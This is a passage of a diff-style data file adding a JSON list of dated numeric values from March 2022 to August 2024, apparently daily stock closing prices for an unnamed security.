"2022-03-17", + 149.7255096435547 + ], + [ + "2022-03-18", + 152.6482391357422 + ], + [ + "2022-03-21", + 152.34567260742188 + ], + [ + "2022-03-22", + 153.1890106201172 + ], + [ + "2022-03-23", + 149.32957458496094 + ], + [ + "2022-03-24", + 156.867919921875 + ], + [ + "2022-03-25", + 156.51316833496094 + ], + [ + "2022-03-28", + 157.7289581298828 + ], + [ + "2022-03-29", + 161.34414672851562 + ], + [ + "2022-03-30", + 156.18421936035156 + ], + [ + "2022-03-31", + 152.6302947998047 + ], + [ + "2022-04-01", + 149.673095703125 + ], + [ + "2022-04-04", + 152.10462951660156 + ], + [ + "2022-04-05", + 145.1033172607422 + ], + [ + "2022-04-06", + 141.4945526123047 + ], + [ + "2022-04-07", + 141.80418395996094 + ], + [ + "2022-04-08", + 138.2857666015625 + ], + [ + "2022-04-11", + 135.444580078125 + ], + [ + "2022-04-12", + 135.03179931640625 + ], + [ + "2022-04-13", + 137.93746948242188 + ], + [ + "2022-04-14", + 134.1223602294922 + ], + [ + "2022-04-18", + 136.44432067871094 + ], + [ + "2022-04-19", + 139.43385314941406 + ], + [ + "2022-04-20", + 139.12425231933594 + ], + [ + "2022-04-21", + 135.412353515625 + ], + [ + "2022-04-22", + 132.40025329589844 + ], + [ + "2022-04-25", + 134.63833618164062 + ], + [ + "2022-04-26", + 128.66897583007812 + ], + [ + "2022-04-27", + 127.9659194946289 + ], + [ + "2022-04-28", + 135.01890563964844 + ], + [ + "2022-04-29", + 129.24948120117188 + ], + [ + "2022-05-02", + 133.56442260742188 + ], + [ + "2022-05-03", + 134.67056274414062 + ], + [ + "2022-05-04", + 139.89500427246094 + ], + [ + "2022-05-05", + 133.11940002441406 + ], + [ + "2022-05-06", + 131.9326171875 + ], + [ + "2022-05-09", + 125.21505737304688 + ], + [ + "2022-05-10", + 128.06268310546875 + ], + [ + "2022-05-11", + 124.27981567382812 + ], + [ + "2022-05-12", + 125.03446197509766 + ], + [ + "2022-05-13", + 131.41661071777344 + ], + [ + "2022-05-16", + 129.4171600341797 + ], + [ + "2022-05-17", + 135.7025604248047 + ], + [ + "2022-05-18", + 128.86248779296875 + ], + [ + "2022-05-19", + 128.08201599121094 + ], + [ + "2022-05-20", + 128.01429748535156 + ], + [ + "2022-05-23", + 128.5657958984375 + ], + [ + "2022-05-24", + 125.43434143066406 + ], + [ + "2022-05-25", + 127.6917953491211 + ], + [ + "2022-05-26", + 132.68080139160156 + ], + [ + "2022-05-27", + 138.13742065429688 + ], + [ + "2022-05-31", + 137.42791748046875 + ], + [ + "2022-06-01", + 135.2478790283203 + ], + [ + "2022-06-02", + 139.95950317382812 + ], + [ + "2022-06-03", + 135.77352905273438 + ], + [ + "2022-06-06", + 136.00892639160156 + ], + [ + "2022-06-07", + 137.0957794189453 + ], + [ + "2022-06-08", + 134.1771697998047 + ], + [ + "2022-06-09", + 130.3686065673828 + ], + [ + "2022-06-10", + 125.73699188232422 + ], + [ + "2022-06-13", + 118.4828109741211 + ], + [ + "2022-06-14", + 119.1417007446289 + ], + [ + "2022-06-15", + 121.18940734863281 + ], + [ + "2022-06-16", + 113.88677978515625 + ], + [ + "2022-06-17", + 114.34864807128906 + ], + [ + "2022-06-21", + 117.34269714355469 + ], + [ + "2022-06-22", + 116.11859893798828 + ], + [ + "2022-06-23", + 115.33052825927734 + ], + [ + "2022-06-24", + 120.44010162353516 + ], + [ + "2022-06-27", + 120.11063385009766 + ], + [ + "2022-06-28", + 117.18120574951172 + ], + [ + "2022-06-29", + 114.4164810180664 + ], + [ + "2022-06-30", + 112.91783142089844 + ], + [ + "2022-07-01", + 108.92255401611328 + ], + [ + "2022-07-05", + 109.78167724609375 + ], + [ + "2022-07-06", + 110.31782531738281 + ], + [ + "2022-07-07", + 115.2562255859375 + ], + [ + "2022-07-08", + 115.8052978515625 + ], + [ + "2022-07-11", + 113.13746643066406 + ], + [ + "2022-07-12", + 113.45397186279297 + ], + [ + "2022-07-13", + 114.09349060058594 + ], + [ + "2022-07-14", + 116.51261901855469 + ], + [ + "2022-07-15", + 119.29350280761719 + ], + [ + "2022-07-18", + 118.91238403320312 + ], + [ + "2022-07-19", + 124.1543960571289 + ], + [ + "2022-07-20", + 127.3196029663086 + ], + [ + "2022-07-21", + 129.39962768554688 + ], + [ + "2022-07-22", + 126.21178436279297 + ], + [ + "2022-07-25", + 125.41400909423828 + ], + [ + "2022-07-26", + 123.3243179321289 + ], + [ + "2022-07-27", + 128.96681213378906 + ], + [ + "2022-07-28", + 130.55592346191406 + ], + [ + "2022-07-29", + 131.56040954589844 + ], + [ + "2022-08-01", + 132.06747436523438 + ], + [ + "2022-08-02", + 131.81553649902344 + ], + [ + "2022-08-03", + 135.47817993164062 + ], + [ + "2022-08-04", + 136.45677185058594 + ], + [ + "2022-08-05", + 135.39418029785156 + ], + [ + "2022-08-08", + 133.34646606445312 + ], + [ + "2022-08-09", + 127.23568725585938 + ], + [ + "2022-08-10", + 132.5164031982422 + ], + [ + "2022-08-11", + 132.34524536132812 + ], + [ + "2022-08-12", + 136.2177734375 + ], + [ + "2022-08-15", + 136.724853515625 + ], + [ + "2022-08-16", + 135.32632446289062 + ], + [ + "2022-08-17", + 132.05776977539062 + ], + [ + "2022-08-18", + 135.06796264648438 + ], + [ + "2022-08-19", + 131.4214630126953 + ], + [ + "2022-08-22", + 126.47664642333984 + ], + [ + "2022-08-23", + 127.10641479492188 + ], + [ + "2022-08-24", + 127.42619323730469 + ], + [ + "2022-08-25", + 132.0965576171875 + ], + [ + "2022-08-26", + 124.60334777832031 + ], + [ + "2022-08-29", + 122.08731079101562 + ], + [ + "2022-08-30", + 120.66618347167969 + ], + [ + "2022-08-31", + 119.40332794189453 + ], + [ + "2022-09-01", + 117.18767547607422 + ], + [ + "2022-09-02", + 115.90220642089844 + ], + [ + "2022-09-06", + 114.56502532958984 + ], + [ + "2022-09-07", + 116.50293731689453 + ], + [ + "2022-09-08", + 118.4666748046875 + ], + [ + "2022-09-09", + 121.30892181396484 + ], + [ + "2022-09-12", + 121.89996337890625 + ], + [ + "2022-09-13", + 114.32926177978516 + ], + [ + "2022-09-14", + 115.62767028808594 + ], + [ + "2022-09-15", + 113.7091293334961 + ], + [ + "2022-09-16", + 114.39063262939453 + ], + [ + "2022-09-19", + 114.99137878417969 + ], + [ + "2022-09-20", + 113.46365356445312 + ], + [ + "2022-09-21", + 112.31708526611328 + ], + [ + "2022-09-22", + 109.26167297363281 + ], + [ + "2022-09-23", + 107.79857635498047 + ], + [ + "2022-09-26", + 106.1820297241211 + ], + [ + "2022-09-27", + 107.16922760009766 + ], + [ + "2022-09-28", + 108.6889877319336 + ], + [ + "2022-09-29", + 105.30850219726562 + ], + [ + "2022-09-30", + 103.50296783447266 + ], + [ + "2022-10-03", + 107.08155822753906 + ], + [ + "2022-10-04", + 112.1052017211914 + ], + [ + "2022-10-05", + 113.02096557617188 + ], + [ + "2022-10-06", + 112.5696029663086 + ], + [ + "2022-10-07", + 105.8150863647461 + ], + [ + "2022-10-10", + 102.2170181274414 + ], + [ + "2022-10-11", + 99.34310150146484 + ], + [ + "2022-10-12", + 98.37863159179688 + ], + [ + "2022-10-13", + 101.21034240722656 + ], + [ + "2022-10-14", + 96.99202728271484 + ], + [ + "2022-10-17", + 99.04759216308594 + ], + [ + "2022-10-18", + 99.38855743408203 + ], + [ + "2022-10-19", + 100.02503967285156 + ], + [ + "2022-10-20", + 100.6452865600586 + ], + [ + "2022-10-21", + 104.38624572753906 + ], + [ + "2022-10-24", + 104.83763122558594 + ], + [ + "2022-10-25", + 107.23092651367188 + ], + [ + "2022-10-26", + 106.175537109375 + ], + [ + "2022-10-27", + 104.29206848144531 + ], + [ + "2022-10-28", + 108.38050079345703 + ], + [ + "2022-10-31", + 106.0196533203125 + ], + [ + "2022-11-01", + 106.87372589111328 + ], + [ + "2022-11-02", + 103.49972534179688 + ], + [ + "2022-11-03", + 102.11309051513672 + ], + [ + "2022-11-04", + 106.83800506591797 + ], + [ + "2022-11-07", + 109.14686584472656 + ], + [ + "2022-11-08", + 111.54991149902344 + ], + [ + "2022-11-09", + 107.98431396484375 + ], + [ + "2022-11-10", + 119.15846252441406 + ], + [ + "2022-11-11", + 122.80522918701172 + ], + [ + "2022-11-14", + 121.4608383178711 + ], + [ + "2022-11-15", + 124.9809799194336 + ], + [ + "2022-11-16", + 119.82093048095703 + ], + [ + "2022-11-17", + 120.7594223022461 + ], + [ + "2022-11-18", + 121.02894592285156 + ], + [ + "2022-11-21", + 119.0220718383789 + ], + [ + "2022-11-22", + 122.56819915771484 + ], + [ + "2022-11-23", + 124.04898071289062 + ], + [ + "2022-11-25", + 122.39608001708984 + ], + [ + "2022-11-28", + 119.33707427978516 + ], + [ + "2022-11-29", + 118.87593841552734 + ], + [ + "2022-11-30", + 126.00715637207031 + ], + [ + "2022-12-01", + 125.10112762451172 + ], + [ + "2022-12-02", + 123.68852233886719 + ], + [ + "2022-12-05", + 122.12330627441406 + ], + [ + "2022-12-06", + 119.55464935302734 + ], + [ + "2022-12-07", + 119.29811096191406 + ], + [ + "2022-12-08", + 122.7468032836914 + ], + [ + "2022-12-09", + 121.6102294921875 + ], + [ + "2022-12-12", + 123.76322937011719 + ], + [ + "2022-12-13", + 125.89031982421875 + ], + [ + "2022-12-14", + 124.00157928466797 + ], + [ + "2022-12-15", + 118.75548553466797 + ], + [ + "2022-12-16", + 117.85669708251953 + ], + [ + "2022-12-19", + 116.3978271484375 + ], + [ + "2022-12-20", + 115.68791961669922 + ], + [ + "2022-12-21", + 118.2930679321289 + ], + [ + "2022-12-22", + 113.51263427734375 + ], + [ + "2022-12-23", + 113.61032104492188 + ], + [ + "2022-12-27", + 111.55876159667969 + ], + [ + "2022-12-28", + 109.9142837524414 + ], + [ + "2022-12-29", + 113.42145538330078 + ], + [ + "2022-12-30", + 113.3172378540039 + ], + [ + "2023-01-03", + 112.21329498291016 + ], + [ + "2023-01-04", + 115.10176849365234 + ], + [ + "2023-01-05", + 113.16093444824219 + ], + [ + "2023-01-06", + 118.42658233642578 + ], + [ + "2023-01-09", + 120.60836029052734 + ], + [ + "2023-01-10", + 122.168212890625 + ], + [ + "2023-01-11", + 123.74433135986328 + ], + [ + "2023-01-12", + 125.24878692626953 + ], + [ + "2023-01-13", + 125.76656341552734 + ], + [ + "2023-01-17", + 125.90985107421875 + ], + [ + "2023-01-18", + 125.24878692626953 + ], + [ + "2023-01-19", + 121.735107421875 + ], + [ + "2023-01-20", + 125.54512023925781 + ], + [ + "2023-01-23", + 131.84959411621094 + ], + [ + "2023-01-24", + 130.8531036376953 + ], + [ + "2023-01-25", + 131.2080841064453 + ], + [ + "2023-01-26", + 133.41917419433594 + ], + [ + "2023-01-27", + 132.5692596435547 + ], + [ + "2023-01-30", + 129.04901123046875 + ], + [ + "2023-01-31", + 131.45553588867188 + ], + [ + "2023-02-01", + 138.31033325195312 + ], + [ + "2023-02-02", + 141.51466369628906 + ], + [ + "2023-02-03", + 138.75320434570312 + ], + [ + "2023-02-06", + 136.49978637695312 + ], + [ + "2023-02-07", + 140.8406219482422 + ], + [ + "2023-02-08", + 137.81211853027344 + ], + [ + "2023-02-09", + 138.16380310058594 + ], + [ + "2023-02-10", + 135.9656982421875 + ], + [ + "2023-02-13", + 137.9651641845703 + ], + [ + "2023-02-14", + 140.4693603515625 + ], + [ + "2023-02-15", + 141.04249572753906 + ], + [ + "2023-02-16", + 137.5841522216797 + ], + [ + "2023-02-17", + 135.44143676757812 + ], + [ + "2023-02-21", + 131.05499267578125 + ], + [ + "2023-02-22", + 130.42654418945312 + ], + [ + "2023-02-23", + 134.71522521972656 + ], + [ + "2023-02-24", + 132.3022003173828 + ], + [ + "2023-02-27", + 133.00234985351562 + ], + [ + "2023-02-28", + 133.45826721191406 + ], + [ + "2023-03-01", + 133.4940948486328 + ], + [ + "2023-03-02", + 134.5621795654297 + ], + [ + "2023-03-03", + 136.63653564453125 + ], + [ + "2023-03-06", + 135.04737854003906 + ], + [ + "2023-03-07", + 133.6243438720703 + ], + [ + "2023-03-08", + 137.17709350585938 + ], + [ + "2023-03-09", + 134.4514923095703 + ], + [ + "2023-03-10", + 131.8528594970703 + ], + [ + "2023-03-13", + 131.8918914794922 + ], + [ + "2023-03-14", + 135.74754333496094 + ], + [ + "2023-03-15", + 134.1649169921875 + ], + [ + "2023-03-16", + 139.40451049804688 + ], + [ + "2023-03-17", + 138.5415496826172 + ], + [ + "2023-03-20", + 140.00694274902344 + ], + [ + "2023-03-21", + 140.28375244140625 + ], + [ + "2023-03-22", + 138.88998413085938 + ], + [ + "2023-03-23", + 142.67433166503906 + ], + [ + "2023-03-24", + 140.1997528076172 + ], + [ + "2023-03-27", + 138.5543670654297 + ], + [ + "2023-03-28", + 137.51622009277344 + ], + [ + "2023-03-29", + 141.93653869628906 + ], + [ + "2023-03-30", + 144.2740020751953 + ], + [ + "2023-03-31", + 145.1685333251953 + ], + [ + "2023-04-03", + 143.9149169921875 + ], + [ + "2023-04-04", + 141.23138427734375 + ], + [ + "2023-04-05", + 138.7829132080078 + ], + [ + "2023-04-06", + 138.0679473876953 + ], + [ + "2023-04-10", + 140.50662231445312 + ], + [ + "2023-04-11", + 139.76882934570312 + ], + [ + "2023-04-12", + 137.2126007080078 + ], + [ + "2023-04-13", + 138.3421630859375 + ], + [ + "2023-04-14", + 138.12672424316406 + ], + [ + "2023-04-17", + 138.12672424316406 + ], + [ + "2023-04-18", + 138.72413635253906 + ], + [ + "2023-04-19", + 137.2061004638672 + ], + [ + "2023-04-20", + 137.07876586914062 + ], + [ + "2023-04-21", + 136.07325744628906 + ], + [ + "2023-04-24", + 135.46279907226562 + ], + [ + "2023-04-25", + 130.911865234375 + ], + [ + "2023-04-26", + 131.61050415039062 + ], + [ + "2023-04-27", + 132.16549682617188 + ], + [ + "2023-04-28", + 134.54869079589844 + ], + [ + "2023-05-01", + 135.766357421875 + ], + [ + "2023-05-02", + 134.79678344726562 + ], + [ + "2023-05-03", + 133.24935913085938 + ], + [ + "2023-05-04", + 132.5017547607422 + ], + [ + "2023-05-05", + 135.44969177246094 + ], + [ + "2023-05-08", + 136.02101135253906 + ], + [ + "2023-05-09", + 133.70639038085938 + ], + [ + "2023-05-10", + 135.06776428222656 + ], + [ + "2023-05-11", + 134.1830596923828 + ], + [ + "2023-05-12", + 134.05897521972656 + ], + [ + "2023-05-15", + 137.69903564453125 + ], + [ + "2023-05-16", + 137.44113159179688 + ], + [ + "2023-05-17", + 140.8363494873047 + ], + [ + "2023-05-18", + 145.28607177734375 + ], + [ + "2023-05-19", + 144.53846740722656 + ], + [ + "2023-05-22", + 145.0379638671875 + ], + [ + "2023-05-23", + 143.24566650390625 + ], + [ + "2023-05-24", + 140.6829071044922 + ], + [ + "2023-05-25", + 150.0524139404297 + ], + [ + "2023-05-26", + 159.859375 + ], + [ + "2023-05-30", + 159.7255401611328 + ], + [ + "2023-05-31", + 155.62515258789062 + ], + [ + "2023-06-01", + 158.30218505859375 + ], + [ + "2023-06-02", + 157.92996215820312 + ], + [ + "2023-06-05", + 155.48475646972656 + ], + [ + "2023-06-06", + 157.3619384765625 + ], + [ + "2023-06-07", + 157.13015747070312 + ], + [ + "2023-06-08", + 158.73855590820312 + ], + [ + "2023-06-09", + 159.156982421875 + ], + [ + "2023-06-12", + 164.28282165527344 + ], + [ + "2023-06-13", + 166.48294067382812 + ], + [ + "2023-06-14", + 168.84645080566406 + ], + [ + "2023-06-15", + 167.4505615234375 + ], + [ + "2023-06-16", + 165.904296875 + ], + [ + "2023-06-20", + 164.5607147216797 + ], + [ + "2023-06-21", + 160.54959106445312 + ], + [ + "2023-06-22", + 161.29820251464844 + ], + [ + "2023-06-23", + 158.45738220214844 + ], + [ + "2023-06-26", + 158.97061157226562 + ], + [ + "2023-06-27", + 164.52474975585938 + ], + [ + "2023-06-28", + 163.25636291503906 + ], + [ + "2023-06-29", + 163.3021240234375 + ], + [ + "2023-06-30", + 165.82583618164062 + ], + [ + "2023-07-03", + 167.30015563964844 + ], + [ + "2023-07-05", + 163.6029052734375 + ], + [ + "2023-07-06", + 161.5401153564453 + ], + [ + "2023-07-07", + 161.6087646484375 + ], + [ + "2023-07-10", + 164.97262573242188 + ], + [ + "2023-07-11", + 164.9791717529297 + ], + [ + "2023-07-12", + 168.05203247070312 + ], + [ + "2023-07-13", + 171.52378845214844 + ], + [ + "2023-07-14", + 169.37930297851562 + ], + [ + "2023-07-17", + 173.43292236328125 + ], + [ + "2023-07-18", + 173.7532958984375 + ], + [ + "2023-07-19", + 171.69053649902344 + ], + [ + "2023-07-20", + 165.44664001464844 + ], + [ + "2023-07-21", + 166.94056701660156 + ], + [ + "2023-07-24", + 166.93402099609375 + ], + [ + "2023-07-25", + 169.7421417236328 + ], + [ + "2023-07-26", + 167.3982391357422 + ], + [ + "2023-07-27", + 170.5463409423828 + ], + [ + "2023-07-28", + 174.26979064941406 + ], + [ + "2023-07-31", + 174.99224853515625 + ], + [ + "2023-08-01", + 175.10342407226562 + ], + [ + "2023-08-02", + 168.40187072753906 + ], + [ + "2023-08-03", + 167.97032165527344 + ], + [ + "2023-08-04", + 167.7055206298828 + ], + [ + "2023-08-07", + 169.47085571289062 + ], + [ + "2023-08-08", + 166.77386474609375 + ], + [ + "2023-08-09", + 163.71405029296875 + ], + [ + "2023-08-10", + 163.05368041992188 + ], + [ + "2023-08-11", + 159.10137939453125 + ], + [ + "2023-08-14", + 163.691162109375 + ], + [ + "2023-08-15", + 160.95822143554688 + ], + [ + "2023-08-16", + 157.8428192138672 + ], + [ + "2023-08-17", + 156.29981994628906 + ], + [ + "2023-08-18", + 157.1399688720703 + ], + [ + "2023-08-21", + 161.6544952392578 + ], + [ + "2023-08-22", + 160.22923278808594 + ], + [ + "2023-08-23", + 163.50479125976562 + ], + [ + "2023-08-24", + 158.10108947753906 + ], + [ + "2023-08-25", + 158.78103637695312 + ], + [ + "2023-08-28", + 160.79151916503906 + ], + [ + "2023-08-29", + 165.0150909423828 + ], + [ + "2023-08-30", + 165.79315185546875 + ], + [ + "2023-08-31", + 166.94056701660156 + ], + [ + "2023-09-01", + 167.3753662109375 + ], + [ + "2023-09-05", + 167.31980895996094 + ], + [ + "2023-09-06", + 166.1102294921875 + ], + [ + "2023-09-07", + 162.30836486816406 + ], + [ + "2023-09-08", + 161.46817016601562 + ], + [ + "2023-09-11", + 161.37667846679688 + ], + [ + "2023-09-12", + 160.00692749023438 + ], + [ + "2023-09-13", + 160.8274688720703 + ], + [ + "2023-09-14", + 161.9781494140625 + ], + [ + "2023-09-15", + 157.3034210205078 + ], + [ + "2023-09-18", + 157.8395538330078 + ], + [ + "2023-09-19", + 156.50904846191406 + ], + [ + "2023-09-20", + 153.9395294189453 + ], + [ + "2023-09-21", + 151.09877014160156 + ], + [ + "2023-09-22", + 152.35736083984375 + ], + [ + "2023-09-25", + 153.47210693359375 + ], + [ + "2023-09-26", + 150.6854705810547 + ], + [ + "2023-09-27", + 152.01416015625 + ], + [ + "2023-09-28", + 154.82899475097656 + ], + [ + "2023-09-29", + 155.38999938964844 + ], + [ + "2023-10-02", + 156.17408752441406 + ], + [ + "2023-10-03", + 152.94259643554688 + ], + [ + "2023-10-04", + 154.97335815429688 + ], + [ + "2023-10-05", + 154.2220458984375 + ], + [ + "2023-10-06", + 157.53558349609375 + ], + [ + "2023-10-09", + 157.14187622070312 + ], + [ + "2023-10-10", + 159.15623474121094 + ], + [ + "2023-10-11", + 160.35365295410156 + ], + [ + "2023-10-12", + 160.76377868652344 + ], + [ + "2023-10-13", + 156.3873291015625 + ], + [ + "2023-10-16", + 158.6017608642578 + ], + [ + "2023-10-17", + 157.44369506835938 + ], + [ + "2023-10-18", + 154.6059112548828 + ], + [ + "2023-10-19", + 152.22412109375 + ], + [ + "2023-10-20", + 150.0227813720703 + ], + [ + "2023-10-23", + 149.16981506347656 + ], + [ + "2023-10-24", + 151.19398498535156 + ], + [ + "2023-10-25", + 145.0820770263672 + ], + [ + "2023-10-26", + 144.21925354003906 + ], + [ + "2023-10-27", + 145.77101135253906 + ], + [ + "2023-10-30", + 143.81898498535156 + ], + [ + "2023-10-31", + 145.13450622558594 + ], + [ + "2023-11-01", + 148.54974365234375 + ], + [ + "2023-11-02", + 151.92556762695312 + ], + [ + "2023-11-03", + 155.91818237304688 + ], + [ + "2023-11-06", + 155.6294708251953 + ], + [ + "2023-11-07", + 156.62025451660156 + ], + [ + "2023-11-08", + 156.7777099609375 + ], + [ + "2023-11-09", + 156.0264434814453 + ], + [ + "2023-11-10", + 162.31881713867188 + ], + [ + "2023-11-13", + 160.73753356933594 + ], + [ + "2023-11-14", + 166.68214416503906 + ], + [ + "2023-11-15", + 167.89273071289062 + ], + [ + "2023-11-16", + 167.9747314453125 + ], + [ + "2023-11-17", + 169.15577697753906 + ], + [ + "2023-11-20", + 171.6490936279297 + ], + [ + "2023-11-21", + 168.44058227539062 + ], + [ + "2023-11-22", + 168.97862243652344 + ], + [ + "2023-11-24", + 169.09999084472656 + ], + [ + "2023-11-27", + 168.86378479003906 + ], + [ + "2023-11-28", + 167.87631225585938 + ], + [ + "2023-11-29", + 169.6970977783203 + ], + [ + "2023-11-30", + 168.51275634765625 + ], + [ + "2023-12-01", + 169.30340576171875 + ], + [ + "2023-12-04", + 167.40716552734375 + ], + [ + "2023-12-05", + 166.4557647705078 + ], + [ + "2023-12-06", + 165.4288787841797 + ], + [ + "2023-12-07", + 169.86439514160156 + ], + [ + "2023-12-08", + 171.20619201660156 + ], + [ + "2023-12-11", + 177.04583740234375 + ], + [ + "2023-12-12", + 178.32205200195312 + ], + [ + "2023-12-13", + 181.06796264648438 + ], + [ + "2023-12-14", + 186.0874481201172 + ], + [ + "2023-12-15", + 186.7796630859375 + ], + [ + "2023-12-18", + 186.2613067626953 + ], + [ + "2023-12-19", + 187.25535583496094 + ], + [ + "2023-12-20", + 181.70433044433594 + ], + [ + "2023-12-21", + 186.73370361328125 + ], + [ + "2023-12-22", + 187.33197021484375 + ], + [ + "2023-12-26", + 190.64210510253906 + ], + [ + "2023-12-27", + 191.1319122314453 + ], + [ + "2023-12-28", + 190.7736053466797 + ], + [ + "2023-12-29", + 189.37327575683594 + ], + [ + "2024-01-02", + 182.5524139404297 + ], + [ + "2024-01-03", + 178.63082885742188 + ], + [ + "2024-01-04", + 177.12860107421875 + ], + [ + "2024-01-05", + 178.1114501953125 + ], + [ + "2024-01-08", + 183.91331481933594 + ], + [ + "2024-01-09", + 183.97576904296875 + ], + [ + "2024-01-10", + 183.35777282714844 + ], + [ + "2024-01-11", + 184.034912109375 + ], + [ + "2024-01-12", + 183.22300720214844 + ], + [ + "2024-01-16", + 185.81983947753906 + ], + [ + "2024-01-17", + 184.1171112060547 + ], + [ + "2024-01-18", + 190.195068359375 + ], + [ + "2024-01-19", + 197.63392639160156 + ], + [ + "2024-01-22", + 198.2814483642578 + ], + [ + "2024-01-23", + 199.59632873535156 + ], + [ + "2024-01-24", + 202.50218200683594 + ], + [ + "2024-01-25", + 201.94009399414062 + ], + [ + "2024-01-26", + 196.49656677246094 + ], + [ + "2024-01-29", + 198.54119873046875 + ], + [ + "2024-01-30", + 195.4742431640625 + ], + [ + "2024-01-31", + 192.6439971923828 + ], + [ + "2024-02-01", + 193.59727478027344 + ], + [ + "2024-02-02", + 196.06922912597656 + ], + [ + "2024-02-05", + 198.7482452392578 + ], + [ + "2024-02-06", + 196.43080139160156 + ], + [ + "2024-02-07", + 199.4352569580078 + ], + [ + "2024-02-08", + 202.86376953125 + ], + [ + "2024-02-09", + 206.90371704101562 + ], + [ + "2024-02-12", + 206.52896118164062 + ], + [ + "2024-02-13", + 202.28524780273438 + ], + [ + "2024-02-14", + 206.85440063476562 + ], + [ + "2024-02-15", + 206.65713500976562 + ], + [ + "2024-02-16", + 205.48690795898438 + ], + [ + "2024-02-20", + 202.02882385253906 + ], + [ + "2024-02-21", + 201.56532287597656 + ], + [ + "2024-02-22", + 211.49916076660156 + ], + [ + "2024-02-23", + 209.2178497314453 + ], + [ + "2024-02-26", + 211.28221130371094 + ], + [ + "2024-02-27", + 211.0718231201172 + ], + [ + "2024-02-28", + 208.698486328125 + ], + [ + "2024-02-29", + 214.35238647460938 + ], + [ + "2024-03-01", + 223.47425842285156 + ], + [ + "2024-03-04", + 225.6700897216797 + ], + [ + "2024-03-05", + 221.24559020996094 + ], + [ + "2024-03-06", + 226.6825408935547 + ], + [ + "2024-03-07", + 234.4566650390625 + ], + [ + "2024-03-08", + 224.9699249267578 + ], + [ + "2024-03-11", + 221.98190307617188 + ], + [ + "2024-03-12", + 226.58721923828125 + ], + [ + "2024-03-13", + 221.0647735595703 + ], + [ + "2024-03-14", + 217.28782653808594 + ], + [ + "2024-03-15", + 215.72972106933594 + ], + [ + "2024-03-18", + 215.56207275390625 + ], + [ + "2024-03-19", + 213.75738525390625 + ], + [ + "2024-03-20", + 217.3963165283203 + ], + [ + "2024-03-21", + 222.28765869140625 + ], + [ + "2024-03-22", + 222.55418395996094 + ], + [ + "2024-03-25", + 221.68548583984375 + ], + [ + "2024-03-26", + 220.01719665527344 + ], + [ + "2024-03-27", + 222.78123474121094 + ], + [ + "2024-03-28", + 223.01815795898438 + ], + [ + "2024-04-01", + 225.36758422851562 + ], + [ + "2024-04-02", + 221.89280700683594 + ], + [ + "2024-04-03", + 222.51470947265625 + ], + [ + "2024-04-04", + 216.21664428710938 + ], + [ + "2024-04-05", + 218.7832489013672 + ], + [ + "2024-04-08", + 219.34593200683594 + ], + [ + "2024-04-09", + 221.70523071289062 + ], + [ + "2024-04-10", + 217.65792846679688 + ], + [ + "2024-04-11", + 222.5739288330078 + ], + [ + "2024-04-12", + 215.26898193359375 + ], + [ + "2024-04-15", + 212.54443359375 + ], + [ + "2024-04-16", + 214.1534881591797 + ], + [ + "2024-04-17", + 207.65802001953125 + ], + [ + "2024-04-18", + 203.97592163085938 + ], + [ + "2024-04-19", + 195.8417510986328 + ], + [ + "2024-04-22", + 199.0697784423828 + ], + [ + "2024-04-23", + 203.2257080078125 + ], + [ + "2024-04-24", + 205.8614044189453 + ], + [ + "2024-04-25", + 209.68170166015625 + ], + [ + "2024-04-26", + 214.11402893066406 + ], + [ + "2024-04-29", + 215.7427978515625 + ], + [ + "2024-04-30", + 211.2413787841797 + ], + [ + "2024-05-01", + 204.10426330566406 + ], + [ + "2024-05-02", + 208.6945343017578 + ], + [ + "2024-05-03", + 213.3933868408203 + ], + [ + "2024-05-06", + 217.82574462890625 + ], + [ + "2024-05-07", + 215.90077209472656 + ], + [ + "2024-05-08", + 216.1080780029297 + ], + [ + "2024-05-09", + 215.29859924316406 + ], + [ + "2024-05-10", + 217.41111755371094 + ], + [ + "2024-05-13", + 217.8651885986328 + ], + [ + "2024-05-14", + 221.48806762695312 + ], + [ + "2024-05-15", + 227.70713806152344 + ], + [ + "2024-05-16", + 226.59164428710938 + ], + [ + "2024-05-17", + 225.30838012695312 + ], + [ + "2024-05-20", + 230.26388549804688 + ], + [ + "2024-05-21", + 229.5235137939453 + ], + [ + "2024-05-22", + 232.2184600830078 + ], + [ + "2024-05-23", + 230.91539001464844 + ], + [ + "2024-05-24", + 235.4958038330078 + ], + [ + "2024-05-28", + 239.47402954101562 + ], + [ + "2024-05-29", + 234.52838134765625 + ], + [ + "2024-05-30", + 232.8995819091797 + ], + [ + "2024-05-31", + 231.0042266845703 + ], + [ + "2024-06-03", + 231.3793487548828 + ], + [ + "2024-06-04", + 229.57289123535156 + ], + [ + "2024-06-05", + 239.61221313476562 + ], + [ + "2024-06-06", + 237.64779663085938 + ], + [ + "2024-06-07", + 236.9370574951172 + ], + [ + "2024-06-10", + 240.3525848388672 + ], + [ + "2024-06-11", + 240.55029296875 + ], + [ + "2024-06-12", + 247.330810546875 + ], + [ + "2024-06-13", + 250.01930236816406 + ], + [ + "2024-06-14", + 249.11981201171875 + ], + [ + "2024-06-17", + 253.0537109375 + ], + [ + "2024-06-18", + 256.27593994140625 + ], + [ + "2024-06-20", + 249.31752014160156 + ], + [ + "2024-06-21", + 246.8860321044922 + ], + [ + "2024-06-24", + 239.83863830566406 + ], + [ + "2024-06-25", + 243.52540588378906 + ], + [ + "2024-06-26", + 242.57652282714844 + ], + [ + "2024-06-27", + 241.33116149902344 + ], + [ + "2024-06-28", + 243.77252197265625 + ], + [ + "2024-07-01", + 243.76263427734375 + ], + [ + "2024-07-02", + 247.1924285888672 + ], + [ + "2024-07-03", + 251.31410217285156 + ], + [ + "2024-07-05", + 251.8083038330078 + ], + [ + "2024-07-08", + 256.58233642578125 + ], + [ + "2024-07-09", + 256.4637451171875 + ], + [ + "2024-07-10", + 262.4139709472656 + ], + [ + "2024-07-11", + 253.78514099121094 + ], + [ + "2024-07-12", + 256.87890625 + ], + [ + "2024-07-15", + 257.1655578613281 + ], + [ + "2024-07-16", + 258.75689697265625 + ], + [ + "2024-07-17", + 240.3525848388672 + ], + [ + "2024-07-18", + 241.0741424560547 + ], + [ + "2024-07-19", + 233.7006072998047 + ], + [ + "2024-07-22", + 243.38702392578125 + ], + [ + "2024-07-23", + 239.75955200195312 + ], + [ + "2024-07-24", + 227.00900268554688 + ], + [ + "2024-07-25", + 221.94834899902344 + ], + [ + "2024-07-26", + 226.71249389648438 + ], + [ + "2024-07-29", + 226.23805236816406 + ], + [ + "2024-07-30", + 218.0243377685547 + ], + [ + "2024-07-31", + 232.6528778076172 + ], + [ + "2024-08-01", + 215.8893585205078 + ], + [ + "2024-08-02", + 204.41387939453125 + ], + [ + "2024-08-05", + 200.80616760253906 + ], + [ + "2024-08-06", + 202.6248321533203 + ], + [ + "2024-08-07", + 196.98098754882812 + ], + [ + 